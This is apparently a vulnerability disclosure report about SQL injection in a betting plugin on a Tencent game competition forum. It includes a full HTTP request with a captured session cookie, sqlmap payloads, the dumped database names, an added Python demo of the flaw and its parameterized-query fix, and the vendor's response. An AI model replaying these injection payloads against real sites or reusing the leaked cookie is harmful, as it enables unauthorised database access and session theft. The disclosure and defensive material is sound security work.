2013-12-06: Details have been sent to the vendor and are awaiting vendor handling
2013-12-06: The vendor has confirmed; details are disclosed to the vendor only
2013-12-16: Details disclosed to core white hats and experts in the relevant field
2013-12-26: Details disclosed to regular white hats
2014-01-05: Details disclosed to intern white hats
2014-01-20: Details disclosed to the public
SQL injection on a site of Tencent's game competition platform TGA
The problem is in TGA's bbs, http://bbs.tga.plu.cn. The forum has a betting plugin that is vulnerable to SQL injection.
Adding a single quote produces a database error.
So I fed the request straight into sqlmap. Since it is a bbs, a logged-in cookie is required:
GET /plugin.php?id=tgabet:official&view=bet&gid=324 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: bbs.tga.plu.cn
Cookie: pgv_si=s3218769920; BAIDU_CLB_REFER=http%3A%2F%2Ftga.qq.com%2F; pgv_info=ssid=s826767176&ssi=s445771245; pgv_pvi=9775746048; p1u_id=be62972e0e3b14f5a5d3c44cb5e293ffe4487a31d3160196cccd62db03a094322f85c175a90bd6e6; PHPSESSID=a024bc65cbbf4b5ff8fc1d5f8b6f1a73; pgv_info=ssid=s826767176&ssi=s445771245; Hm_lpvt_1cbb74d806aabe66aa1929ede5b12aa1=1386245195; CNZZDATA2171795=cnzz_eid%3D1211801768-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063392%26rtime%3D2; CNZZDATA4990323=cnzz_eid%3D836961960-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063462%26rtime%3D2; CNZZDATA5261713=cnzz_eid%3D925025665-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063488%26rtime%3D2; CNZZDATA5405344=cnzz_eid%3D212189416-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063513%26rtime%3D2; ts_refer=bbs.tga.plu.cn/plugin.php; pgv_pvid=668465096; ts_uid=5735968957; Hm_lvt_1cbb74d806aabe66aa1929ede5b12aa1=1386171235,1386171240,1386238064,1386244548; ts_last=tga.plu.cn/; CNZZDATA2171795=cnzz_eid%3D1211801768-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063392%26rtime%3D2; CNZZDATA4990323=cnzz_eid%3D836961960-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063462%26rtime%3D2; CNZZDATA5111507=cnzz_eid%3D1620167765-1386244570-http%253A%252F%252Fbbs.tga.plu.cn%26ntime%3D1386244570%26cnzz_a%3D19%26ltime%3D1386244570624; CNZZDATA5261713=cnzz_eid%3D925025665-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063488%26rtime%3D2; tjpctrl=1386246377664; y0XB_f66b_saltkey=T9ZjZj62; y0XB_f66b_lastvisit=1386241603; y0XB_f66b_sid=kOONqn; y0XB_f66b_lastact=1386246274%09forum.php%09; y0XB_f66b_ulastactivity=51dfDecyxFVPI0ZsLPihV05CRfMueMfuoAl3iMeyA0D4wk1J2LMI; y0XB_f66b_auth=573aACXrH%2BOm2%2BX2xu%2FQ8WvKvA%2F7zooCXa4gcakMqlCbOd4STI8UM%2FVtEPGp8Teo9bcIV%2Bp5G9KeHkAPamtmyxF2fqIN; y0XB_f66b_lastcheckfeed=2232996%7C1386245396; y0XB_f66b_security_cookiereport=ae31aahIldqhRDHjjWZ%2BvvrFt%2FjcsXg8E6fa4rzFCj2IpTPWbz3Q; y0XB_f66b_nofavfid=1; y0XB_f66b_onlineusernum=528; y0XB_f66b_sendmail=1
Then running sqlmap with -r cookie.txt dumps the data:
Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)
---
available databases [9]:
[*] AdCount
[*] AppStore
[*] information_schema
[*] mysql
[*] performance_schema
[*] PLU_Bak
[*] PLU_Jobs
[*] PLUHome
[*] ucbbs
The database privileges are not small either.
I don't know whether a shell could be written; sqlmap couldn't, at any rate. It feels like TGA is outsourced to PLU.
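To make the finding concrete from the defender's side, here is an added example (written for this page, not code from the report or from the TGA/PLU plugin) that reproduces in miniature why the gid parameter is exploitable and what the fix looks like. It uses an in-memory SQLite table with constructed rows; the table name bet_game, the column names and the function names are assumptions for the example, not the plugin's real schema. The vulnerable lookup concatenates gid into the SQL text, so the page's boolean-based probe (gid=324 AND 2667=2667 versus a false condition) changes the result set, and a stray single quote raises a database error, exactly the two symptoms described above. The hardened lookup validates gid as an integer and binds it as a query parameter, so both probes are rejected before any SQL runs.

```python
import sqlite3

# Constructed sample data standing in for the betting plugin's game table.
# Schema and names are assumptions for this example, not the plugin's own.
SAMPLE_ROWS = [
    (324, "Game 324"),
    (325, "Game 325"),
]


def make_db():
    """Build an in-memory SQLite database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bet_game (gid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO bet_game VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, gid_param):
    """Vulnerable pattern: the raw request value becomes part of the SQL text.
    Anything after the number is parsed as SQL, which is what sqlmap probes."""
    sql = "SELECT gid, title FROM bet_game WHERE gid=" + gid_param
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, gid_param):
    """Hardened pattern: reject non-integer input, then bind as a parameter.
    The value can never alter the query structure, only the bound integer."""
    if not gid_param.isdigit():
        raise ValueError("gid must be a non-negative integer")
    sql = "SELECT gid, title FROM bet_game WHERE gid=?"
    return conn.execute(sql, (int(gid_param),)).fetchall()


def errors_out(conn, gid_param):
    """True if the vulnerable lookup raises a database error for this input
    (the 'add a single quote and it errors' observation from the report)."""
    try:
        lookup_vulnerable(conn, gid_param)
        return False
    except sqlite3.Error:
        return True


def demo():
    """Run both lookups against the probe inputs and collect the outcomes."""
    conn = make_db()
    results = {
        # A trailing quote breaks the SQL syntax in the vulnerable version.
        "quote_errors": errors_out(conn, "324'"),
        # Boolean-based blind: a true condition keeps the row ...
        "true_condition": lookup_vulnerable(conn, "324 AND 2667=2667"),
        # ... and a false condition removes it, leaking one bit per request.
        "false_condition": lookup_vulnerable(conn, "324 AND 2667=2668"),
        # The hardened version still serves a normal request.
        "hardened_normal": lookup_hardened(conn, "324"),
    }
    try:
        lookup_hardened(conn, "324 AND 2667=2667")
        results["hardened_rejected"] = False
    except ValueError:
        results["hardened_rejected"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The integer check is the cheap first line of defence for a numeric id like gid, and the bound parameter is the one that actually closes the hole; in a Discuz-style PHP plugin the equivalent is casting the parameter with intval() before it reaches the query and, where the code base supports it, using a prepared statement rather than string assembly. Error-based and time-based variants from the sqlmap output fall to the same fix, since none of the injected SQL ever reaches the parser.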
At the plugin.
Severity: Low
Vulnerability Rank: 5
Confirmed at: 2013-12-06 17:12
Thank you very much for your report. On confirmation, this issue belongs to the business of a Tencent partner; we have notified the relevant party and the issue is already being handled. If you have any questions, feel free to give feedback, and we will have a dedicated person follow up.
None for now.